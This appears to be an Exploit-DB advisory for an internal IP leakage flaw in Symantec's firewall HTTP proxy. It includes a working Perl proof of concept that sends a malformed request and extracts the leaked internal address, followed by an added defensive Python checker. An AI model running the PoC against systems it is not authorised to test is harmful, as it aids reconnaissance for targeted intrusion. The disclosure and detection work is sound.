Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage

🗓️ 10 May 2006 00:00:00 | Reported by Bernhard Mueller | Type: exploitdb | 🔗 www.exploit-db.com

Symantec Enterprise Firewall / Gateway Security - NAT/HTTP Proxy Internal IP Leakage

Code
source: https://www.securityfocus.com/bid/17936/info

Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness. 

The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers. 

An attacker may use this information to carry out targeted attacks against a potentially vulnerable host.

#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot} com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use IO::Socket;

$| = 1;

$host = $ARGV[0] or die "$0 <host>\n";

$request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
    PeerAddr => $host,
    PeerPort => 80,
    Proto => 'tcp',
);

die "could not open socket: $!\n" unless $sock;

print $sock $request;

print "waiting for timeout (this can take about 1 min.)\n";

while (<$sock>) {
    if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
        $ip = $1;
    }
}

if (defined($ip)) {
    print "$host: $ip\n";
} else {
    print "failed.\n";
}

close($sock);
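
A defender-side check for the leak described above, as an added example that is not part of the original advisory or PoC: it scans a captured HTTP response from a gateway for RFC 1918 addresses in the status line, headers and body. The sample response is constructed (its body layout is an assumption based on the pattern the PoC matches), and `internal_addresses` is a hypothetical helper name.

```python
import ipaddress
import re

# Dotted-quad candidates that are not part of a longer dotted number.
IPV4_RE = re.compile(rb"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?!\d|\.\d)")
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def internal_addresses(raw_response: bytes):
    """Return sorted (location, ip) pairs for RFC 1918 addresses found
    in the status line, header values or body of a raw HTTP response."""
    pieces = re.split(rb"\r?\n\r?\n", raw_response, maxsplit=1)
    body = pieces[1] if len(pieces) > 1 else b""
    lines = pieces[0].splitlines() or [b""]
    parts = [("status-line", lines[0])]
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        parts.append(("header:" + name.decode("latin-1").strip().lower(), value))
    parts.append(("body", body))

    findings = set()
    for location, data in parts:
        for match in IPV4_RE.finditer(data):
            try:
                ip = ipaddress.IPv4Address(match.group(1).decode("ascii"))
            except ipaddress.AddressValueError:
                continue  # out-of-range octets, not an address
            if any(ip in net for net in RFC1918):
                findings.add((location, str(ip)))
    return sorted(findings)

# Constructed sample: an error page that echoes the request path after an
# internal address, the shape the PoC's regular expression looks for.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 400 Bad Request\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>Cannot process http://10.238.94.67XXX/XXX</body></html>\r\n"
)

if __name__ == "__main__":
    for location, ip in internal_addresses(SAMPLE_RESPONSE):
        print(f"internal address {ip} exposed in {location}")
```

Run it over responses captured at the external interface, including error responses to malformed requests, since that is where this weakness shows up.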
